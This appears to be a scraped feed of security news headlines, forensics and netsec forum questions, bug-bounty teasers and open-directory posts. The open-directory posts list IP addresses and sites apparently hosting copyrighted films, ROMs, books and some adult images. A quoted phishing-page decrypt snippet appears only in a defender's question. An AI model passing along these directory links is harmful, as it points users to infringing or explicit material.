    - http://5.135.165.24/files/ => Some movies, but mostly French-translated mangas
    - http://37.187.0.8/ => Sound banks, audio software, movies/series (French and multi)
    - http://5.135.162.62/ => Russian-dubbed anime
    - http://51.75.134.149/ => Spanish radio rips / podcasts
    - http://37.187.112.153/ => Anime (German subs)
    - http://37.187.114.44/download/ => Mostly series, movies (French)
    - http://37.187.121.54:38946/ => Games, movies
    - http://37.187.124.143:9000/ => Movies, series (mostly multi and French subs), HQ
    - http://81.250.154.102/ => Indie music?
    - https://81.51.239.219/ => ROMS, French books
    - https://163.172.40.198/ => French radio rips
    - https://podcast.ouest-track.com/ => All podcasts of "ouest-track" radio (French)
    - https://ffgl.eu/images/ => Router firmwares
    There doesn't seem to be NSFW content on those ODs; I didn't go through everything though. submitted by /u/MasterIO02

    Distributed Identity aka Identity on the Blockchain - What it is and its vulnerable attack surfaces. (Part 1)
    submitted by /u/CyberArkLabs
    Pixel 6 Bootloader: Exploitation (part 3)
    submitted by /u/jeandrew
    Overview of SQLi and Access Flaws in Zendesk
    submitted by /u/TotallyNotTeaPot
    Hyperpom: An Apple Silicon Fuzzer for 64-bit ARM Binaries
    submitted by /u/jeandrew
    Checkmk: Remote Code Execution by Chaining Multiple Bugs (3/3)
    submitted by /u/monoimpact
    GuardDog: Identifying malicious PyPI packages using static code analysis and package metadata analysis
    submitted by /u/thorn42
    Stealing passwords from infosec Mastodon - without bypassing CSP
    submitted by /u/albinowax
    ABI compatibility in Python: how hard could it be?
    submitted by /u/yossarian_flew_away
    Hacking Salesforce-backed WebApps
    submitted by /u/albinowax
    Intro to AJP, AJPFuzzer and re-discovering Ghostcat
    submitted by /u/nibblesec
    DivestOS CVE Patcher - A tool for downloading, checking, and applying (CVE) patches to a (kernel) repository
    submitted by /u/Gallus
    WonderCMS 3.1.3 Vulnerable to Authenticated Server-Side Request Forgery – CVE-2020-35313
    submitted by /u/SL7reach

    Windows 10 File Activity Logs
    I need to get log files of data being transferred from the hard drive of a computer to an external USB attached to the device. I know roughly when it happened, so combing through log files won't be too tedious, I hope. Are there any programs that make getting activity like this easy? Recommendations would be helpful. submitted by /u/QualityQontent

    P1 Bug Bounties: What is an IDOR, and how does IDOR == $$$?
    TL;DR - A brief post about what an IDOR is, and what they mean to the bug-hunting world. Continue reading on The Gray Area »
    Web App Pentesting/Bug Bounty Bible
    Wassup everyone, I hope you all are doing great in your lives and I know you all might be brutally cussing me right now for not uploading… Continue reading on Medium »
    Winning QR with DOM-Based XSS | Bug Bounty POC
    Background: Continue reading on Medium »
    A Brief Introduction to SAML Security Vector
    SAML started in 2001, and the final SAML 2.0 version was released in 2005. Continue reading on Medium »
    How did I find a vulnerability in BMW's system?
    After the “subdomain takeover” vulnerability I found in Mercedes-Benz's system, one of my friends' remark “Inshallah, you'll find a hole in BMW too”… Continue reading on Medium »
    Wanna Bet That CSRF Is Not As Hard as You Think?
    An introduction to CSRF attacks, with an example of how a hacker can take advantage of sessions to prepare some dangerous attacks. Continue reading on CodeX »
    Wanna Bet That CSRF Is Not As Hard as You Think?
    An introduction to CSRF attacks, with an example of how a hacker can take advantage of sessions to prepare some dangerous attacks. Continue reading on InfoSec Write-ups »

    SecWiki News 2022-11-15 Review
    No news updates yet today~ For more of the latest articles, visit SecWiki

    Double Feature: X and Pearl
    Before this year, I had never heard of Ti West. Everything changed with the release of X — A Marca da Morte. The filmmaker had previously made… Continue reading on Medium »
    There is no escape
    At least, not the way you expect. Continue reading on Medium »

    Linux History File Timestamps
    While working at TrustedSec, I was issued a new company-furnished laptop to work from. While the Mac OS environment was useful, I found it useful to also set up an Ubuntu virtual machine. One reason is so I can have access to a Linux host that is very similar to the garden variety of Linux systems... The post Linux History File Timestamps appeared first on TrustedSec.

    Critical Vulnerability in Spotify's Backstage
    Article URL: https://www.securityweek.com/organizations-warned-critical-vulnerability-backstage-developer-portal-platform Comments URL: https://news.ycombinator.com/item?id=33608747 Points: 1 # Comments: 1

    Check Out The Full Speaker Line-Up of IWCON 2022
    No content preview
    Gauing+Nuclei for Instant Bounties
    No content preview
    Stealthy Persistence While Using Windows Terminal.
    No content preview

    FreeBuf Morning Report | CISA says midterm election voting was unaffected by cyberattacks; Italy bans the use of facial recognition technology
    Cybersecurity and Infrastructure Security Agency (CISA) Director Jen Easterly said in a statement on Wednesday that the midterm voting process was not disrupted or compromised by cyberattacks.
    Check now! Android may be exposed to a major risk: the lock screen can be easily bypassed in two minutes
    Android may have suffered a major security risk: anyone who can get hold of someone's phone may be able to easily bypass the phone's lock screen password.
    VuCSA: a client-server security practice platform packed with vulnerabilities
    Researchers can use VuCSA to learn, study and demonstrate how to perform security penetration testing on non-HTTP thick clients.
    Google backs down! Settles for $391.5 million
    Google will pay $391.5 million to settle allegations by 40 states that it illegally tracked users' locations.
    How to use jscythe to execute arbitrary JS code through Node.js's Inspector mechanism
    With the help of jscythe, researchers can use the Inspector mechanism provided by Node.js to force processes built on Node.js/Electron/v8 to execute arbitrary JavaScript code.

    Open redirect at mc-beta-cloud-acronis.com
    Acronis disclosed a bug submitted by angeltsvetkov: https://hackerone.com/reports/846389

    On Nuclei YAML template syntax and ideas for Pocsuite3 compatibility
    Author: fenix@Knownsec 404 Lab Date: 2022-11-15 Preface: Pocsuite3 is an open-source remote vulnerability testing framework under the GPLv2 license, built by Knownsec 404 Lab [1]. The framework itself is developed in Python3 and integrates the APIs of many security services such as ZoomEye, Shodan, CEye and Interactsh; users can quickly write PoC/Exp on top of Pocsuite3 and run them against batches of targets...

    RegRipper Value Proposition
    I recently posted to LinkedIn, asking my network for their input regarding the value proposition of RegRipper; specifically, how is RegRipper v3.0 of "value" to them, how does it enhance their work? I did this because I really wanted to get the perspective of folks who use RegRipper; what I do with RegRipper could be referred to as both "maintain" and "abuse". Just kidding, but the point is that I know, beyond the shadow of a doubt, that I'm not a "typical user" of RegRipper...and that's the perspective I was looking for. Unfortunately, things didn't go the way I'd hoped. The direct question of "what is the value proposition of RegRipper v3.0" was not directly answered. Other ideas came in, but what I wasn't getting was the perspective of folks who use the tool. As such, I thought I'd tr…


    USEFUL WEBSITES FOR PEN-TESTERS, HACKERS & BUG HUNTERS ✳ hackers won't believe they exist
    Exploits Database 💥 Continue reading on Medium »
    VALID E-mail address payload lists of different bug classes
    cross-site scripting: Continue reading on Medium »
    The Complete Guide To Cyber Security YouTubers
    It can be difficult to find good quality Cyber Security YouTubers, therefore I have created a definitive list of all the best Cyber… Continue reading on Medium »
    Malware Techniques
    This is a repository of resources about malware techniques. A curated list of resources to analyse and study malware techniques. Continue reading on Medium »
    Bug Bounty Tips — Part 1
    Here are some tips and annotations that I’ve made based on articles and writeups that I’ve read Continue reading on Medium »
    Bug Bounty Tips — Part 1
    Here are tips and notes I made based on articles and writeups I have read Continue reading on Medium »
    P1 Bounties: Cross-Site Scripting (XSS) Tips And Tricks
    TL;DR - A guide on what XSS is, how to find it, how to exploit it, and then how to make the most money off of it. Continue reading on The Gray Area »
    XSS using a username
    XSS triggered by exploiting a vulnerable input field of a signup page. Continue reading on Medium »
    Some “tips” on bug hunting
    Hey guys, it’s me Uday and today in this story [This is a dynamic story of bug hunting and you’ll see updates in future, Comments… Continue reading on Medium »

    Java Fuzzing with Jazzer compared to Symflower
    Fuzzing is a testing technique where random values are generated as inputs to find unexpected behavior such as crashes and security issues… Continue reading on Medium »

    A Technical Analysis of Royal Ransomware [PDF]
    submitted by /u/CyberMasterV
    Forensic Analysis/e-Discovery Company?
    Hi all, I was wondering if anyone has experience with Archer Hall or TransPerfect Legal Solutions in terms of working with them on forensic analysis and/or e-Discovery cases? I’d like some opinions on each company if possible. submitted by /u/EvidenceNo2488
    Encrypted HTML Code
    I have been getting a few HTML files through our email system. In the past these used to be Base64-encoded HTML files that I could easily pipe through CyberChef and get the actual code to find the URLs or IPs that I would like to block. Recently, though, I've been getting a string of emails with HTMLs that are using AES encryption to obfuscate the code. I am curious if there is a quick and easy way of decoding the code in the file? I would assume there would need to be, as they are run locally, so the computer would need to decrypt them by itself or with publicly accessible data to allow the HTML to run. Is there anyone that is able to provide any guidance on how this could be done? Example: the code itself is in two sections; the first section is the code itself, and the second section, I assume, is part of the encryption key. File: var decrypted = CryptoJS.AES.decrypt("EncryptedCode", "encryptedkey????");document.write(decrypted.toString(CryptoJS.enc.Utf8)); I changed some of the source paths; if you need the rest, please let me know. submitted by /u/Sparks_IT
    Spyguard
    Anyone having any luck using SpyGuard (SpyGuard · GitHub)? We went as far as getting the Wi-Fi AP up but we can't connect to it (tried several different devices). submitted by /u/KLDSpeedyfly
    What sort of expert do I need?
    I'm a lawyer and I have a digital document that is a suspected forgery in a civil case I'm involved in. I am aware that there are Questioned/Forensic Document Examiners, but my understanding is that they are primarily concerned with physical documents, including forged signatures and handwriting. In my case, the suspected forgery is currently a digital document in PDF format. What kind of forensics expert do I need to provide expert testimony concerning a suspected forged PDF document? submitted by /u/FabsudNalteb
    Is using an Android emulator like BlueStacks a forensically viable method of testing app behavior?
    For example, if I wanted to confirm where, how, and when an application creates folders in the file system when I send an attachment. And I do my due diligence to match the operating system and version numbers. Could this be used as an explanation in court, or is this a dangerous oversimplification or misunderstanding of BlueStacks' capability? submitted by /u/Expensive_Ad6442

    Posting on behalf of a friend who believes she's been hacked for the past two years. Looking for any advice.
    So, I've been maliciously targeted by a group of ex-coworkers and was hacked completely on my Android phone because I left it unattended. I left that job, switched cell providers and switched to iPhone. I'm still noticing some weird activity on my iPhone and am worried these women are still targeting me. I know there is nothing physically (like a virus) on the phone and it has been updated to iOS 16. This phone has never been left alone. I just want to know if there's any way my phone can still be targeted remotely, or only as long as the "hacker" is in close proximity. Or are there any network-based methods that would allow you to monitor or control an iPhone?
    Phone make: iPhone 13 Pro
    Provider: AT&T
    Issues/concerns:
    - Every time Safari is opened, it wants me to verify that I'm not a robot because of unusual traffic detected from my phone
    - I have not been receiving texts, but I can send them. I usually have to call AT&T support to fix it
    - When I attempt to call certain contacts, it doesn't ring through and goes straight to voicemail; it does go through if I use WhatsApp. Those contacts are also unable to call me unless using WhatsApp
    - My social media feeds are not reflecting what I normally see. It's like there is another person using my profile and interacting with content that I normally never would interact with
    - The 2FA on my social media/banking apps was turned off and there were no other logins than myself
    - TikTok was denied network access, while all other apps like YouTube worked fine, even when on Wi-Fi. (I have no VPNs installed on this phone.) When it's working normally, I frequently get a message from the app saying that my network is unstable
    - My iPhone is constantly overheating
    - My phone is not receiving service despite having full bars
    - Received suspicious texts with links in them (I always delete these and block the number)
    submitted by /u/kay-pii
    SOC with machine learning
    Hello guys, I'm trying to do a SOC implementation with ML and the main problem I have is getting a great dataset with normal and malicious logs to train it. Should I implement a honeypot to create the dataset, or what do you recommend? Thx submitted by /u/Secret_Director_5984
    SANS SEC 504
    Greetings, so I am new(ish) to cyber security and its related components but did have a question I wanted to run by you guys and gals. For a brief background, I spent about 9 1/2 years in the Army in the Signal Corps where I had nominal exposure to security, though more from the physical perspective. I did not want to keep doing that once I left the Army and so, after working some hodgepodge jobs, I am going full bore back into school. I have a friend who is heavily involved in cybersecurity, having worked for NCC Group and AT&T, primarily as a pen tester, who recommended among other things the SEC 504 course from the SANS Institute. To date I have SEC+ and was doing some studying for the A+ and NET+ certifications. Would this be too large of a jump starting out and if so, then where should I start? Thanks in advance for any help. submitted by /u/nofancyname12

    More of the stuff stuff...
    - Columbo, have watched a few of them... https://ia801608.us.archive.org/14/items/columbo/
    - Muzak... http://dora-robo.com/muzyka/
    - Music mp4's http://80s.lt/Files/Videos/MusicVideos/With%20Pictures/
    - Some bootie pics... looks like a vid sale site... https://www.bootysource.com/video/
    - Now I like these dirs, full of old non-woke imagery http://www.portension.com/assets/?C=S;O=D https://karlsbakk.net/fun/
    - Ass images, jpg format http://xapanthe.com/butt/
    submitted by /u/xanderTgreat

    BugTrails-23 Writeup
    No content preview
    IW Weekly #33: 15,000 Sites Hacked, $70,000 Bounty, API Injection Vulnerabilities, IDOR…
    No content preview
    Razor Black Active Directory Writeup
    No content preview
    Python APT1 Simulator
    No content preview

    SecWiki News 2022-11-14 Review
    China eBPF Conference talk slides by ourren; SecWiki Weekly (Issue 454) by ourren; Todesk, a simple and practical remote control tool, by shuteer. For more of the latest articles, visit SecWiki

    Threat and Vulnerability Hunting with Application Server Error Logs
    submitted by /u/SnooDucks7926
    Starlink User Terminal Modchip
    submitted by /u/Gallus

    Attack Simulator for SolarWinds, Codecov, and ua-parser-js breaches
    The SUNSPOT malware, the Codecov breach, and a lot of compromised open-source packages (as was the case with ua-parser-js) target the CI/CD pipeline to modify release builds or exfiltrate credentials. As part of writing tests for the Harden Runner GitHub Action, which prevents such attacks, there was a need to write an attack simulator for these attacks. You can check out the attack simulator here: https://github.com/step-security/attack-simulator It has information and relevant links about these attacks in one place. There is a set of GitHub Actions workflows that simulate the steps from these attacks. There is also a malware simulator npm package which simulates the behavior of typical compromised npm packages using the preinstall step. Wanted to share in case one is looking for a similar attack simulator for attacks on CI/CD pipelines. submitted by /u/varunsh-coder
    ASU has a CTF practice site that is open to the public -- pwn.college
    submitted by /u/verfahrensweise

    CVE-2022-32929 – Bypass iOS backup's TCC protection
    Article URL: https://theevilbit.github.io/posts/cve-2022-32929/ Comments URL: https://news.ycombinator.com/item?id=33594357 Points: 3 # Comments: 0

    Typhon Reborn With New Capabilities
    Typhon Stealer, a crypto miner/stealer for hire that was discovered in August 2022, now has an updated version called Typhon Reborn. The post Typhon Reborn With New Capabilities appeared first on Unit 42.

    Well-hidden malware quietly spreading across Asia and Africa
    A cyber-espionage group known as Worok has been found hiding malware in seemingly harmless image files, which serve as a key link in the attackers' infection chain.
    Metabase CVE-2021-41277 information disclosure vulnerability reproduction
    Vulnerability overview: Metabase is an open-source data analytics platform from the US company Metabase. Metabase contains an information disclosure vulnerability caused by a missing permission check on the product's admin->settings->maps->custom maps->add a map operation. An attacker can exploit this vulnerability to obtain sensitive information. CNNVD ID: CNNVD-202111-1565 Severity: critical CVE ID: CVE-2021-41277 FOFA search app="M
    FreeBuf Morning Report | Apple faces a class-action lawsuit in California; Australia considers banning ransom payments to ransomware hackers
    A netizen, Damon (pseudonym), posted on social media that the Dewu app apparently used phone permissions without authorization and deleted a video he had uploaded as evidence for a consumer complaint.
    Dewu app reported to have deleted user videos: is your photo album still safe?
    The Dewu app is suspected of using users' phone permissions to delete videos on their phones related to problem goods.
    Ransom unpaid by the deadline: high-tech company Thales' stolen data leaked by Lockbit
    After attacking global high-tech company Thales at the end of last month, Lockbit began leaking the stolen data on the 10th.
    Over 200 million a year involved: five members of an international investment fraud ring arrested
    The group ran call centers and offices in several countries and lured investors through fake websites.
    Crypto trading giant FTX attacked and files for bankruptcy; $600 million in assets drained
    FTX was previously the world's second-largest cryptocurrency exchange, but unable to cope with the surge in user withdrawal demands, it has now filed for bankruptcy protection in the US.

    OSINTGRAM. What it is and how to install it.
    Continue reading on Medium »
    OSINT and Top 15 Open-Source Intelligence Tools
    This blog sheds some light on the term OSINT, its types, actors interested in OSINT gathering, exploration, and what benefits OSINT… Continue reading on Medium »

    IceXLoader malware compromises thousands of victims' computers worldwide
    Author: Natalie Zargarov Translator: Knownsec 404 Lab translation team Original link: https://minerva-labs.com/blog/new-updated-icexloader-claims-thousands-of-victims-around-the-world/ IceXLoader was discovered by FortiGuard Labs last June. It is commercial malware used on infected computers to download...
    Learn how to attack SAML 2.0 Security
    Author: Longofo@Knownsec 404 Team Chinese version: https://paper.seebug.org/2006/ SAML began in 2001, and the final version of SAML 2.0 was released in 2005. Since then, no major version has been r...

    What do the OXDR and OMDR include?
    Invinsense OXDR and OMDR help you act like an attacker, know the loopholes in the system, and help your security team fix those loopholes. Continue reading on Medium »

    Admin can create a hidden admin account which even the owner cannot detect and remove, and perform administrative actions on the application.
    Reddit disclosed a bug submitted by 41bin: https://hackerone.com/reports/1596663 - Bounty: $5000


    Stealing from scammers using SQL Injection | Ethical Hacking Payback — Part 1
    Have you ever heard about these loot box gambling sites where you can bet the items you won playing games (like CS:GO), and get better… Continue reading on Medium »
    How to get into Bug Bounty?
    Hello Everyone, Continue reading on Medium »
    My First Bounty Story
    Hello Everyone, Continue reading on Medium »
    How I got $100 in just 10 minutes!
    Hello everyone! This is my first Medium write-up; I'm very sorry if I have bad grammar, because English is not my mother tongue. So a… Continue reading on Medium »
    “Neighbour” CTF Walkthrough from TryHackMe
    Hello! Continue reading on Medium »

    Inbound Traffic From Chinese IP by Windows System Kernel: ntoskrnl.exe?
    Does anyone know why ntoskrnl.exe "Windows NT Kernel & System" would be receiving data from IP 1.12.11.10 (China) and 1.100.254.169 (Korea)? Screenshot: https://prnt.sc/dXNFTvoxhKpD submitted by /u/Dbolla5
    Noob question
    Hi -- I want to use Bitwarden to manage my passwords, but I've never used a password manager before. I understand you install the browser extension to manage your passwords on your desktop/laptop, but what happens when I am traveling away from my computer and I don't want to be reliant on my phone either? Do people write down the passwords of the key sites they will use while traveling without depending on their phone? What's the solution? submitted by /u/pardo2k
    Are there any good articles/videos on Facebook showing ads based off of conversations and the data that gets sent to them?
    I know we've all experienced it, but curious how it's coded to work and how it seemingly bypasses the green active mic icon on certain Android devices. submitted by /u/Austinitered
    Risk of using someone else's router while only using HTTPS websites?
    So I live in an apartment and I use my roommate's router. I only use my own laptop and nobody has physical access to my laptop, and I check that I only use HTTPS websites every single time. Is there any risk that my roommate who controls the router will be able to see my private Gmails or private Facebook messages through hacking? P.S. He works in IT and he bragged about hacking someone else's computer before.. submitted by /u/Box_desk

    Some mp3 and some junk...
    - Music, mp3 format, have a poke about... https://bootiemashup.com/wp-content/uploads/2015/02/?C=S;O=D
    - Singy songy mp3's http://168.235.76.63/Downloads/
    - Some cool images, jpg format... http://www.kafkaesqueblog.com/wp-content/uploads/2016/01/?C=S;O=D
    - Bit of learning, Alan Turing, what a brain... https://papers.cnl.salk.edu/PDFs/
    - And let's end this with total bunkum... http://www.downloads.imune.net/medicalbooks/
    I don't see O/D as coming to the end, just what we are expecting from it... submitted by /u/xanderTgreat
    Movies from 2019, English, high quality, decent dl speeds. Root folder has movies from 2016-17, 2021-22 and more in other languages.
    submitted by /u/draebor

    OSINT Exchange Rank v.0.1
    Friends! This article is a little different from the others. But in the end its importance may turn out to be greater than all the previous ones. Continue reading on Medium »
    SPY NEWS: 2022 — Week 45
    Summary of the espionage-related news stories for Week 45 (November 6–12) of 2022. Continue reading on Medium »
    OT Hunt: Moxa Nport
    This is the second topic of “OT Hunt”. These topics expose ICS/OT devices that are connected to the internet. The goal is to build an… Continue reading on Medium »

    SecWiki News 2022-11-13 Review
    Tips for information gathering by 蓝色淡风. For more of the latest articles, visit SecWiki

    Testing for QakBot’s most recent techniques
    Recovering purple teamer here, now leading CTI at Tidal Cyber. My role involves building freely available resources relevant for red, blue, & purple teamers. Last week I pushed a bunch of new threat maps to our community edition (no login required) - the goal is you can easily pivot or overlay offensive and/or defensive capabilities on top of these maps to see a) what you could readily test or b) where gaps exist that could be filled with custom tests/detections. This map shows the most recent techniques associated with QakBot, which I built based on a bunch of recent public CTI reports (sourcing throughout, and you can pivot to my notes with procedural details). I already overlaid Atomic Red Team's testing coverage on top, but you can modify this or add other testing capabilities like Scythe or AttackIQ: https://app.tidalcyber.com/share/47cf91c6-2afd-4027-9a00-cda5058cd41a A new US HHS report out Thursday detailed a bunch of techniques associated with Venus ransomware. I made another custom map around those, and a few more for other ransomware threatening US healthcare orgs this year, none of which are yet defined in ATT&CK. The combined view for those 5 ransomware (60 techniques total) looks like this: https://app.tidalcyber.com/share/09809998-6c73-4208-a507-8c1ca1b311e9 The Community Spotlight has all of the sub-components of those combined maps you can look at individually, and plenty of others. Let me know if I can look at making any others based on recent threats you'd like to see (or give it a go yourself and we can highlight your work in the spotlight). submitted by /u/Trop_Chaud

    Phishing with Google Calendar and Evilginx2 to Deliver a Malicious Zoom Link
    submitted by /u/Dr_Mantis_Tobbogon
    The exploit recon 'msg_msg' and its mitigation in VED
    submitted by /u/hardenedvault

    Advice on how to perform IR on a remote host (lab help)
    submitted by /u/poppybois

    Fuzzing for bugs — 101
    Hey Squad, Continue reading on Medium »

    Analysis of a Smishing Text
    No content preview

    Getting a comprehensive list of a website's outgoing links?
    When you enter a URL in VirusTotal and then click "Links", it shows some outgoing links, but it is not very comprehensive; it doesn't find all the links buried within scripts. For example rarbg: it only shows 2 outgoing links, but everyone knows that rarbg often has clickjacking and JavaScript redirects also. Why doesn't VirusTotal list these URLs as well? Is there a more comprehensive tool that finds all possible outgoing links within a website's scripts and everything else? If you could fetch such a list, and then add it to your hosts file before visiting a site, would you in theory be safe from any outgoing links while on that site? submitted by /u/rigain

    Introducing Shufflecake: plausible deniability for multiple hidden filesystems on Linux
    submitted by /u/0xdea
    Reverse engineering an EV charger
    submitted by /u/FrankTr3nd
    USENIX Security '22 Technical Sessions Talk Recordings
    submitted by /u/sanitybit
    Tunneling Internet through WhatsApp to avoid network restrictions
    submitted by /u/aleixrodriala
  • Open

    Forensics images for Practice?
    Any sources out there? I passed my gcfa exam - looking to use the tools I learned on other images. Is there a source like HacktheBox but for compromised images? Thnx in advance. submitted by /u/bigpoppaash [link] [comments]
    Analysts who find this stuff , how do you deal with it? I hope you get assistance or additional PTO.
    submitted by /u/RobbieRigel [link] [comments]
    Errors importing to Griffeye
    It came up at work recently about the number of errors, often in the hundreds, when importing C4ALL or Vics to Griffeye, and what to do with those errors. I couldn’t answer it myself; can anyone out there, as I’m told they are just ‘normal’? submitted by /u/DicksMyName [link] [comments]
    Extracting images from the RDP Session Cache
    submitted by /u/boutnaru [link] [comments]
    SANS FOR508 Labs
    Hi, I was wondering if you could practise the SANS GCFA exam labs a bit on the SIFT workstation without actually doing the official labs from the training. If yes, what sort of tools should I be focusing on? Also, is it necessary to actually have the lab workbook with you to give you a better chance to pass? I just have indexed hard copies of the course books from a friend; I don't have the labs VM or workbook. submitted by /u/Unthiest [link] [comments]
  • Open

    Text books, yes...
    Some pretty heavy entertaining reading here folks... https://textbookequity.org/Textbooks/ Stop now your evening is all sorted... submitted by /u/xanderTgreat [link] [comments]
    Beer...
    All about beer... http://staff.washington.edu/danej/beerfriday/beerpics/ last post got nuked...lol... submitted by /u/xanderTgreat [link] [comments]
    Fonts from tyfromtheinternet
    https://tyfromtheinternet.com/typetester/webfonts/ submitted by /u/diamond-emerald [link] [comments]
    What is a good search string to find FLAC audio?
    submitted by /u/Persimmon-Alone [link] [comments]
  • Open

    Write-up: Information disclosure on debug page @ PortSwigger Academy
    No content preview
    Understanding Privilege Escalation by Abusing Linux Access Control
    No content preview
    From Shodan Dork to Grafana Local File Inclusion
    No content preview
  • Open

    Digging the perfect fuzzing target (Winafl & WTF)
    If you ask me, the best part of fuzzing closed source targets is the REVERSING and of course checking the crash folder. But sometimes… Continue reading on Medium »
  • Open

    Subdomain takeover at http://test.www.midigator.com
    Equifax disclosed a bug submitted by valluvarsploit_h1: https://hackerone.com/reports/1718371
    Subdomain Takeover on delivey.yelp.com
    Yelp disclosed a bug submitted by racersaravanaa05: https://hackerone.com/reports/1715538
  • Open

    SecWiki News 2022-11-12 Review
    Getting started with UEFI PWN from one challenge by 路人甲; CVE-2021-44707 Adobe Reader out-of-bounds write vulnerability analysis and exploitation by 路人甲; USTC Hackergame 2022 by 路人甲; Java security offense and defense: some no-egress exploitation of older Fastjson versions by 路人甲; A short summary of Python pickle deserialization cases I ran into recently by 路人甲; jpress code audit sharing by 路人甲; ENISA releases the "Threat Landscape 2022" report by ourren. For more of the latest articles, visit SecWiki
  • Open

    OSINT Tip #1 — Contact Exploitation
    Contact exploitation is a technique in which you use a target phone number to leverage the “find friends” functionality within certain… Continue reading on Medium »
  • Open

    Getting stealthy persistence using Visual Studio Code
    Getting persistence with the windows terminal made me eager to search for more possible persistence methods. Being a full time software… Continue reading on Medium »
  • Open

    Bug Zero at a Glance [Week 5–11 November]
    Bug Zero is happy to be a part of #GEW2022 Continue reading on Bug Zero »
    Mobile App Scanner to Find Security Vulnerabilities
    The usage of mobile phones is increasing, and so are the apps for mobile phones. But with these comes a big problem of putting your data at… Continue reading on Medium »
    S3 misconfiguration
    Hi Everyone, my name is Aakash Rathee working as a DevSecOps Engineer (DevOps +Security) at Esper. This article is about an s3… Continue reading on Medium »
    Making API Bug Bounties A Breeze!
    A free tool that plays well with Burp/ZAP and accelerates bounty hunting! Continue reading on Medium »
  • Open

    FreeBuf Morning Report | Review of 2022 financing in China's cybersecurity industry; World Internet Conference releases the "Initiative Against Telecom and Online Fraud"
    As of 10 November 2022, a total of 99 Chinese cybersecurity companies had raised financing in 2022, with amounts ranging from tens of millions to several billion yuan.
  • Open

    [Translation] Cilium's future data plane: supporting 100Gbit/s k8s clusters (KubeCon, 2022)
    Translator's preface: This article is translated from a talk at KubeCon+CloudNativeCon North America 2022: 100 Gbit/s Clusters with Cilium: Building Tomorrow's Networking Data Plane. The authors, Daniel Borkmann, Nikolay Aleksandrov and Nico Vibert, are all from Isovalent (Cilium's parent company). Some background knowledge, code snippets and links were added during translation to aid understanding. The translation was authorized by Daniel. Given the translator's limited ability, omissions or errors may remain; if in doubt, consult the original. The translation follows. Translator's preface; Abstract; 1 Challenges facing large data center networks; 1.1 Cilium's debut (2016); 1.2 IPv6 support status in the container space (k8s/docker): 2016, 2022; 1.3 User requirements; 1.4 Solution; 1.5 State of IPv6 deployment for Internet services; 2 Cilium + IPv6-only K8s clusters; 2.1 Interworking with legacy IPv4 networks/services: NAT46/64; 2.2 Kernel support for NAT46/64 (4.8+); 2.3 Cilium support for NAT46/64 (v1.12+); 2.3.1 How it works; 2.3.2 Feature support; 2.3.3 Mechanism in detail: cluster ingress (IPv4 -> IPv6-only): Option 1: stateful NAT46 gateway; Option 2: stateless NAT46 gateway; 2.3.3 Mechanism in detail: cluster egress (IPv6-only -> IPv4); 2.4 Demo: Cilium NAT46/64 GW (omitted); 2.5 Summary; 3 Cilium + BIG TCP; 3.1 BIG TCP; 3.1.…

  • Open

    USB artifacts
    Hello community! Recently I found a discrepancy in tool reporting versus my registry analysis. I need help in identifying the difference between the two registry locations below. Background: the system being analyzed is a Windows 10 Enterprise ver 6.3 build 19044. Tool is EnCase ver 22. Registry locations: Location 1: Hklm.system.currentcontrolset.deviceclasses.53f56307-b6bf-11d0-94f2-00a0c91efb8b AND Location 2: Hklm.system.currentcontrolset.enum.usbstor.venprodversion.usbserial.properties.83da6326...0066 My understanding is: Location 1 last written time will give you the last connected time of the USB device; Location 2 last written time will give you the last connected time for the corresponding USB within the key. The issue is: Location 1 is saying 09/06 AND Location 2 is saying 09/13. I would greatly appreciate any insight, resources, or tips that can help clear this up. If you need more information please ask. submitted by /u/tummy_tickler2077 [link] [comments]
    Noob: I am trying to find a way to extract .ad1 files on the command line
    In the environment that I am doing this in, I have limited tools. In my environment, I am limited to Autopsy, FTK Imager, and libewf. What I am trying to do is find a way to help make some of my tasks more efficient by using command line tools in PowerShell on windows. I have searched high and low, and I cannot find a way to extract .ad1 files on the command line. I see many ways to make a .ad1 set from both the command line and by GUI. I already know how to do this via the GUI... I did find forensic7z.dll, a plugin for 7zip, but I am not sure I can get that into my environment. This would honestly be my perfect solution... Does anyone have any advice on how I can achieve this? While I can do this via the Gui if I have to, I would strongly prefer to use the command line to run multiple tasks in parallel. I really appreciate any help you can provide. submitted by /u/TheOriginalBvF [link] [comments]
  • Open

    More Stuff...
    Nurudl alert, lovely peeps... http://mirror.reenigne.net/gdc/ ​ Yes some squiggly text stuff or wrong something... https://video.edu.az/videos/video/ ​ What no Idea... http://62.171.143.142/?C=S&O=A ​ So freaking unexpected... http://www.ratsnest.com/pictures/minax/ ​ Last as its Me... Shocking, all complaints to me and not the hard worrrrking mods, Plz... https://archive.shadowwarfare.info submitted by /u/xanderTgreat [link] [comments]
    Recent TV shows, decent speed
    submitted by /u/datskinny [link] [comments]
    Some pop music
    http://penguinradio.dominican.edu/200303_music/ submitted by /u/Shitemoji69 [link] [comments]
  • Open

    Finding Reflected XSS In A Strange Way
    Today I will be talking about how I found a reflected XSS (“Cross Site Scripting”) vulnerability in a very popular bug bounty program and… Continue reading on Medium »
    How to find (“Business_logics”) AND (”Broken Access Control”) Bugs !
    Hello Awesome Hackers, I hope you are all doing well! My name is Mohamed Anani or 0xM5awy. Continue reading on Medium »
    From Shodan Dork to Grafana Local File Inclusion
    Hi readers 📖, This is my new article on local file inclusion I found using shodan recon and further exploiting grafana service. Continue reading on InfoSec Write-ups »
    From Shodan Dork to Grafana Local File Inclusion
    Hi readers 📖, This is my new article on local file inclusion I found using shodan recon and further exploiting grafana service. Continue reading on Medium »
    10 Awesome Tools For Bug Bounty
    Hey, guys! Continue reading on Medium »
    Bypass Duplicate Tweet Protection using negative tweet id
    Twitter doesn’t allow making tweets of same content in relatively near time frame. Continue reading on Medium »
    Intercept Mobile Application Pentest Flutter traffic on iOS and Android (HTTP/HTTPS/SSL Pinning)
    # Cyber Security Continue reading on Medium »
    CORS via XSS leaks User details including Credit Card details.
    Hi Hackers, This is one of the biggest e-commerce websites in the world. But for the sake of privacy we’ll call it fakemart. While Testing… Continue reading on Medium »
    Introduction to software bug hunting [ENG/ESP]
    What is a vulnerability? Continue reading on Medium »
  • Open

    Testing in Go
    Some developers generally choose not to write tests for their code, or have many excuses for not writing them at all. I look inside myself… Continue reading on Medium »
    Short guide about how to install Protocol Fuzzer in Windows 10
    Protocol fuzzer (Peach Fuzzer) is a generational fuzzer that means it generates inputs from scratch. In this algorithm strategy, the fuzz… Continue reading on Medium »
  • Open

    Intergalactic Warfare — Hacktoria Contract Walkthrough (Understanding OSINT)
    In this article we are going to solve another OSINT contract from hacktoria.com, and as amazing as the name sounds, its contract card is… Continue reading on Medium »
    Another cyberdetective trap
